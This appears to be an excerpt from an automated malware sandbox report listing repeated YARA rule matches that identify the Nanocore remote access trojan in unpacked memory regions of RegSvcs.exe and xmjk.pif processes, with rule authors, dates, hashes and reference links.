        Source: 6.2.RegSvcs.exe.3f3b041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.3f307ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.3f307ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.2f177b4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.2f177b4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.60b0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.60b0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.34d9650.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.34d9650.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.57c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.57c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.44c07ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.44c07ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.60b4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.60b4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.3f3b041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.3f3b041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.34de6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.34de6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.44cb041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.44cb041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
